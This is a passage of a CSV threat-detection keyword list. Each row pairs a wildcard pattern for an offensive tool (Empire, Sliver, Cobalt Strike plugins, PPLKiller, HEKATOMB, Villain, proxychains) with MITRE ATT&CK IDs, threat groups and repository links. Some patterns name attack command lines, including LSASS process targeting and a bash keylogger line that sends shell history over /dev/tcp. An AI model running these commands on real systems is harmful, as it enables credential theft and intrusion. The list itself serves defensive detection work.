T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","10","10","792","122","2022-11-17T01:04:04Z","2021-08-06T20:55:26Z" +"*ProcessManager.exe --machine *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*ProcessManager.exe --name explorer*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*processPIDByName*lsass.exe*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","0","N/A","10","8","745","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" +"*ProcessPPKFile*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ProcessPuTTYLocal*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ProcessRDPFile*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ProcessRDPLocal*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ProcessSuperPuTTYFile*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Process-TaskingPackets*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1059","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ProcessThoroughLocal*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ProcessThoroughRemote*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Processus-Thief/HEKATOMB*","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1087.002 - T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","AD Enumeration","https://github.com/Processus-Thief/HEKATOMB","1","1","N/A","N/A","4","372","40","2023-02-08T16:00:47Z","2022-09-09T15:07:15Z" +"*ProcessWinSCPLocal*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*produkey.zip*","offensive_tool_keyword","produkey","ProduKey is a small utility that displays the ProductID and the CD-Key of Microsoft Office (Microsoft Office 2003. Microsoft Office 2007). Windows (Including Windows 8/7/Vista). Exchange Server. and SQL Server installed on your computer. You can view this information for your current running operating system. or for another operating system/computer - by using command-line options. This utility can be useful if you lost the product key of your Windows/Office. 
and you want to reinstall it on your computer.","T1003.001 - T1003.002 - T1012 - T1057 - T1518","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/product_cd_key_viewer.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*produkey_setup.exe*","offensive_tool_keyword","produkey","ProduKey is a small utility that displays the ProductID and the CD-Key of Microsoft Office (Microsoft Office 2003. Microsoft Office 2007). Windows (Including Windows 8/7/Vista). Exchange Server. and SQL Server installed on your computer. You can view this information for your current running operating system. or for another operating system/computer - by using command-line options. This utility can be useful if you lost the product key of your Windows/Office. and you want to reinstall it on your computer.","T1003.001 - T1003.002 - T1012 - T1057 - T1518","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/product_cd_key_viewer.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*produkey-x64.zip*","offensive_tool_keyword","produkey","ProduKey is a small utility that displays the ProductID and the CD-Key of Microsoft Office (Microsoft Office 2003. Microsoft Office 2007). Windows (Including Windows 8/7/Vista). Exchange Server. and SQL Server installed on your computer. You can view this information for your current running operating system. or for another operating system/computer - by using command-line options. This utility can be useful if you lost the product key of your Windows/Office. 
and you want to reinstall it on your computer.","T1003.001 - T1003.002 - T1012 - T1057 - T1518","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/product_cd_key_viewer.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*profiles generate --save *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*profiles new beacon *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*profiles new --mtls *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*ProgIDsUACBypass.*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 
T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" +"*program/replay.pl*","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7136","1096","2023-09-18T14:44:28Z","2012-11-24T04:24:29Z" +"*projectdiscovery/interactsh*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. 
It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C12","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" +"*PROMPT_COMMAND=*history -a* tail *.bash_history > /dev/tcp/127.0.0.1/*","greyware_tool_keyword","bash","Bash Keylogger","T1059 - T1003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*prosody2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*prowler gcp --credentials-file path*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*Proxmark*","offensive_tool_keyword","Proxmark","The proxmark3 is a powerful general purpose RFID tool. the size of a deck of cards. designed to snoop. 
listen and emulate everything from Low Frequency (125kHz) to High Frequency (13.56MHz) tags.","T1210 - T1561 - T1336 - T1335","TA0002 - TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/Proxmark/proxmark3","1","1","N/A","N/A","10","2872","891","2021-03-30T06:59:59Z","2014-03-16T23:36:31Z" +"*proxmark3 -p /dev/ttyACM0*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*Proxy bypass enabled for Neo4j connection*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","0","N/A","10","4","330","38","2023-10-04T14:40:59Z","2022-09-07T13:34:30Z" +"*Proxy Shellcode Handler*","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - 
TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/AggressiveProxy","1","0","N/A","10","10","139","26","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z" +"*proxy.py --dns * --dns_port * --clients*","offensive_tool_keyword","ThunderDNS","This tool can forward TCP traffic over DNS protocol","T1095 - T1071.004","TA0011 - TA0003","N/A","N/A","C2","https://github.com/fbkcs/ThunderDNS","1","0","N/A","10","10","405","60","2019-12-24T12:41:17Z","2018-12-04T15:18:47Z" +"*proxy_bypass.py*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","N/A","10","4","330","38","2023-10-04T14:40:59Z","2022-09-07T13:34:30Z" +"*proxy_cmd_for_exec_by_sibling*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*proxy_linux_amd64*","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. 
both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","1","N/A","5","10","4435","854","2023-04-10T07:30:13Z","2018-12-19T15:59:54Z" +"*proxychains -*","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0006 - TA0040","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","N/A","10","5489","586","2023-04-05T10:32:16Z","2011-02-25T12:27:05Z" +"*proxychains atexec.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*proxychains dcomexec.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*proxychains nmap -sT * -p * -Pn 